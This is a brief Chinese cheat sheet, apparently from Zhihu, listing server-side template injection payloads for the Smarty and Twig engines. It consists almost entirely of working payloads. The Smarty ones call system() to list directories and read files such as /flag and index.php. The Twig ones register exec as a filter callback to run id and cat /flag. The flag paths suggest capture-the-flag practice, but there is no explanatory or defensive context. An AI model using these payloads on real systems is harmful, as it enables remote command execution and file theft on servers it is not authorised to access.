服务端模板注入攻击 - 知乎 比较基础
smarty:
{system('ls')}
{system(‘cat /api’)}
{system(‘cat /css’)}
{system(‘cat /index.php’)}
{system(‘cat /smarty’)}
{system(‘cat /templates_c’)}
{system(‘cat /xff’)}
{system(‘cat /flag’)}
{system(‘cat /flag.php’)}
Twig:
payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}